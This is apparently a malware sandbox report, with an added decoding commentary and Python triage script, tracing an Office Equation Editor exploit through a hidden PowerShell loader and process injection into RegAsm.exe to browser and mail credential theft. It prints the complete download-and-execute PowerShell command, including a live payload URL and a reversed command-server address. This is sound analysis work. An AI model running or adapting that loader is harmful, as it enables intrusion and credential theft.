                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0044E879 FindFirstFileExA,14_2_0044E879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040783C FindFirstFileW,FindNextFileW,14_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407C97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_9-627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CB50
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_003320C9 mov edx, dword ptr fs:[00000030h] 9_2_003320C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_004432B5 mov eax, dword ptr fs:[00000030h] 14_2_004432B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_10004AB4 mov eax, dword ptr fs:[00000030h] 14_2_10004AB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,14_2_00411CFE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00434B47 SetUnhandledExceptionFilter,14_2_00434B47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0043BB22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00434FDC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_100060E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_10002639
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_10002B1C

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload string omitted]'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_004180EF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 14_2_004120F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00419627 mouse_event,14_2_00419627
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq"
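The two process-creation entries above are the complete PowerShell loader chain, and both can be decoded offline. The first stage (launched by wscript.exe) sets $codigo to the second-stage command encoded as UTF-16LE base64 in which every 'A' has been swapped for a placeholder string; the report renders that placeholder as "? ? ? ? ?" and lowercases the whole command line (the first tokens decode to "$imageUrl = 'https://ia…" once the placeholder is put back), so the copy on this page cannot be decoded directly. The second stage fetches vbs.jpg from archive.org, treats the bytes as UTF-8 text, cuts out whatever sits between <<BASE64_START>> and <<BASE64_END>>, base64-decodes it, loads the result with Assembly.Load and invokes dnlib.IO.Home.VAI. The first VAI argument is the next-stage URL written backwards: reversed it reads http://107.172.31.21/xampp/nbc/evrr.txt, the same 107.172.31.21 host that EXCEL.EXE is recorded contacting in the behaviour graph; 'desativado' is Portuguese for "disabled", and 'regasm' names the injection host seen later in the report. The script below is an added example, not code from the report or from the malware: it re-implements both stages as a triage helper. The placeholder string, the stage-1 sample and the "image" carrier are constructed here (the real ones are not recoverable from the page), and the PE check is my addition because Assembly.Load needs a managed PE.

```python
"""Added triage helper for the two PowerShell stages shown on this page.
Not the report's or the malware's code. Constructed samples stand in for the
real $codigo string and the real vbs.jpg, neither of which is on the page in
decodable form; PLACEHOLDER is an assumption about the swapped-in string.
"""
import base64
import re

PLACEHOLDER = "? ? ? ? ?"            # assumed stand-in for the string that replaced 'A'
START, END = "<<BASE64_START>>", "<<BASE64_END>>"


# ---- stage 1: $codigo -> stage-2 command text ---------------------------------
def decode_codigo(codigo: str, placeholder: str = PLACEHOLDER) -> str:
    """Undo the 'A'->placeholder swap, then the UTF-16LE base64 wrapping."""
    raw = base64.b64decode(codigo.replace(placeholder, "A"), validate=True)
    return raw.decode("utf-16-le")


def encode_codigo(command: str, placeholder: str = PLACEHOLDER) -> str:
    """Inverse of decode_codigo; only used here to build a constructed sample."""
    b64 = base64.b64encode(command.encode("utf-16-le")).decode()
    return b64.replace("A", placeholder)


# ---- stage 2: marker-delimited payload inside a fake image --------------------
def carve_payload(image: bytes) -> bytes:
    """Mirror the stager's IndexOf/Substring/FromBase64String on the carrier file."""
    s, e = image.find(START.encode()), image.find(END.encode())
    if s < 0 or e <= s:
        raise ValueError("payload markers not found")
    b64 = image[s + len(START):e]
    return base64.b64decode(re.sub(rb"\s+", b"", b64), validate=True)


def looks_like_pe(data: bytes) -> bool:
    """Cheapest sanity check before calling the blob a .NET assembly: MZ + PE\\0\\0."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decode_vai_args(args) -> dict:
    """On this page the first VAI argument is the C2/next-stage URL reversed."""
    return {"c2_url": args[0][::-1], "injection_host_hint": args[4]}


def triage(codigo: str, image: bytes, vai_args) -> dict:
    payload = carve_payload(image)
    out = {
        "stage2_command": decode_codigo(codigo),
        "payload_len": len(payload),
        "payload_is_pe": looks_like_pe(payload),
    }
    out.update(decode_vai_args(vai_args))
    return out


# ---- constructed samples (not from the report) --------------------------------
STAGE2_COMMAND = ("$imageUrl = 'https://ia803104.us.archive.org/27/items/"
                  "vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient")
SAMPLE_CODIGO = encode_codigo(STAGE2_COMMAND)


def build_fake_pe() -> bytes:
    """Minimal MZ/PE header stub so the PE check has something real to test."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)             # 0x40-byte DOS header
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")      # e_lfanew -> PE signature
    return bytes(hdr) + b"PE\0\0" + b"\0" * 24


FAKE_IMAGE = (b"\xff\xd8\xff\xe0JFIF-junk-" + START.encode()
              + base64.b64encode(build_fake_pe()) + END.encode() + b"-trailer")

# Argument list exactly as recorded in the command line above.
REPORTED_VAI_ARGS = ["txt.rrve/cbn/ppmax/12.13.271.701//:ptth", "desativado",
                     "desativado", "desativado", "regasm", ""]

if __name__ == "__main__":
    print(triage(SAMPLE_CODIGO, FAKE_IMAGE, REPORTED_VAI_ARGS))
```

Run against a captured vbs.jpg, carve_payload gives the exact bytes the victim's PowerShell passed to Assembly.Load, which is what to hash and detonate; the marker strings and the reversed-URL convention are the stable, signature-worthy parts of this loader, the archive.org item name is not.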
Source: RegAsm.exe, 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00434C52 cpuid 14_2_00434C52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,14_2_00452036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_004520C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,14_2_00452313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,14_2_00448404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_0045243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,14_2_00452543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00452610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoA,14_2_0040F8D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,14_2_004488ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: IsValidCodePage,GetLocaleInfoW,14_2_00451CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,14_2_00451F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,14_2_00451F9B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00448957 GetSystemTimeAsFileTime,14_2_00448957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041B60D GetComputerNameExW,GetUserNameW,14_2_0041B60D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_00449190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0041739B GetVersionExW,15_2_0041739B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 14_2_0040BA12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 14_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \key3.db 14_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
